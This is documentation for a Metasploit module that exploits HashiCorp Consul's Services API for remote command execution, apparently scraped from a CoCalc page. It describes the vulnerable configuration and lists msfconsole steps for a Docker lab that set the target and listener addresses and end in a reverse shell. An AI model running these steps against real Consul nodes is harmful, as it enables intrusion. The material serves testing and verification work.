CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/documentation/modules/exploit/multi/misc/consul_service_exec.md
Views: 1904
Vulnerable Application
HashiCorp Consul with -enable-script-checks
configuration flag set to true, or running version 0.9.0 or earlier, with Consul API available on an interface that can be accessed over the network.
Description
This module exploits Hashicorp Consul's Services API to gain remote command execution on a Consul node.
The exposure of the Services API depends on the enable_script_checks
option. This option is opt-in for Consul nodes operators.
Test Setup
The following bash script can be used to setup a testing environment with Docker:
You should observe something similar to the excerpt below when running the script:
The following bash script can be used to stop and destroy all your consul containers (so be careful if you use consul containers for other things at the same time):
Verification Steps
You can verify the module against the vulnerable application with those steps:
Launch a Consul cluster with the provided bash script
Start msfconsole
Do:
use exploit/multi/misc/consul_service_exec
Do:
set RHOST 172.17.0.2
Do:
set RPORT 8500
Do:
check
. The target should appear vulnerable.Do:
set payload
with the payload of your choosing.Do:
set LHOST 172.17.42.1
(docker0 gateway IP)Do:
run
You should get a shell.
Scenarios
Reverse shell on Linux host
Exploit running against a Docker consul container target: